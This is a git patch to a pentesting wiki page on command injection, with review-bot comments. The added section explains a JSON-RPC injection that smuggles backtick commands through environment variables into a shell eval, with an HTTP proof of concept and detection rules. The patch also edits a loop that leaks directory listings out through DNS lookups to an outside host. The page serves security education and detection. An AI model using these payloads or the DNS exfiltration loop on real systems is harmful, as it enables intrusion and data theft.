From 55b8bc55351c7a5eb96bb5e6c3a0f249d7b5f9e7 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 5 Feb 2026 18:49:12 +0000 Subject: [PATCH] Add content from: CVE-2025-6978: Arbitrary Code Execution in the Arista NG Fir... --- src/pentesting-web/command-injection.md | 27 +++++++++++++++++++++++-- 1 file changed, 25 insertions(+), 2 deletions(-) diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index dc2b2c0b8ee..ac3986c9a51 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -104,7 +104,7 @@ Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbi ``` 1. Go to http://dnsbin.zhack.ca/ 2. Execute a simple 'ls' -for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done +for i in $(ls /) ; do host "${i}.3a43c7e4e57a8d0e2057.d.zhack.ca"; done ``` ``` 
@@ -158,6 +158,29 @@ execFile('/usr/bin/do-something', [ Real-world case: *Synology Photos* ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into `id_user` which was later embedded in an `exec()` call, achieving RCE (Pwn2Own Ireland 2024). +### JSON-RPC env vars → shell `eval` chain (blacklist bypass) + +Some web consoles expose JSON-RPC methods that **allow-list** the main action but forward **secondary parameters as environment variables** to a shell script. A typical vulnerable flow: + +- JSON body `params[0]` selects the action (e.g., `"DNS"`) and is checked against an enum. +- `params[1]` is an object; each key/value is concatenated into `KEY=value` and passed as the `envp` argument to `Runtime.exec()` when launching a troubleshooting script. +- A weak blacklist only rejects `; & | > $(`, so **command substitution via backticks** (`` ` ``) survives. +- The script builds a `CMD` string with those environment variables and executes it with `eval`, so injected backticks are executed as root. + +Minimal PoC against such an endpoint (`/admin/JSON-RPC`, authenticated): + +```http +POST /admin/JSON-RPC HTTP/1.1 +Content-Type: application/json + +{"method":"runTroubleshooting","params":["DNS",{"HOST":"127.0.0.1`id`"}],"id":1} +``` + +Network detection hints for this pattern: +- Look for POSTs to `/admin/JSON-RPC` with `method` containing `runTroubleshooting`. +- Inspect `params[1]` object keys like `HOST` or `URL` for command-substitution metacharacters after URL/JSON decoding (case-sensitive). +- Example regex from vendor guidance: `/\x22(HOST|URL)\x22\s*:\s*\x22(?:[^\x22\\]|\\.)*?[\x60\x27\x24\x3c]/`. + ### Argument/Option injection via leading hyphen (argv, no shell metacharacters) Not all injections require shell metacharacters. 
If the application passes untrusted strings as arguments to a system utility (even with `execve`/`execFile` and no shell), many programs will still parse any argument that begins with `-` or `--` as an option. This lets an attacker flip modes, change output paths, or trigger dangerous behaviors without ever breaking into a shell. @@ -216,7 +239,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject ## References -- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection) - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection) - [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection) - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html) @@ -224,5 +246,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) - [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) - [When WebSockets Lead to RCE in CurseForge](https://elliott.diy/blog/curseforge/) +- [CVE-2025-6978 Arista NG Firewall JSON-RPC command injection](https://www.thezdi.com/blog/2026/2/4/cve-2025-6978-arbitrary-code-execution-in-the-arista-ng-firewall) {{#include ../banners/hacktricks-training.md}}
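Review bot: In the first hunk (`@@ -104,7`), the `${i}` change is a no-op: `.` cannot be part of a shell variable name, so `$i.3a43...` already expanded to the same string, and the loop is unchanged in behaviour. Harmless, but since this commit is titled as adding the CVE-2025-6978 content, an unrelated cosmetic tweak in the dnsbin snippet deserves a line in the commit message; it would also help readers if the snippet noted that `3a43c7e4e57a8d0e2057` is the per-session dnsbin token they must replace with their own.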
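Review bot: In the new JSON-RPC section (`@@ -158,6`), the affected product and fixed version are never stated, even though the "Real-world case" line immediately above gives both for Synology Photos and the last hunk adds an Arista NG Firewall reference; add a short "Real-world case: Arista NG Firewall (CVE-2025-6978)" sentence and link to that reference so the section is self-describing. Two points on the detection bullets: the second bullet says every `params[1]` key/value is forwarded as `KEY=value`, so detection that only inspects `HOST` or `URL` (as the quoted regex does) will miss the same injection under any other key; say that the regex is a minimal vendor example and that inspecting all keys of `params[1]` is the safer rule. The regex character class `[\x60\x27\x24\x3c]` also fires on legitimate values containing `$`, `'` or `<`, so flag it as a hunt query with expected false positives rather than a blocking signature. Finally, the section describes the root cause well (env vars concatenated into `CMD` and run with `eval`) but gives no fix; a one-liner such as "fix: validate values against an allow-list and invoke the script with explicit arguments instead of `eval`" would round it out.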
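Review bot: The third hunk (`@@ -216,7`) only removes a byte-identical duplicate of the PayloadsAllTheThings entry, which is correct, but like the `${i}` tweak it is unrelated to the CVE content and is not mentioned in the commit message; either split it out or note it so the diff stat (25 insertions, 2 deletions) is explained.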
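Review bot: In the last hunk (`@@ -224,5`), the new reference title ("Arista NG Firewall JSON-RPC command injection") does not match the source post's title given in the commit subject ("Arbitrary Code Execution in the Arista NG Firewall"); use the post's own title, optionally with the CVE id in front, so the entry is easy to find and consistent with the other entries in the list, which use the source titles.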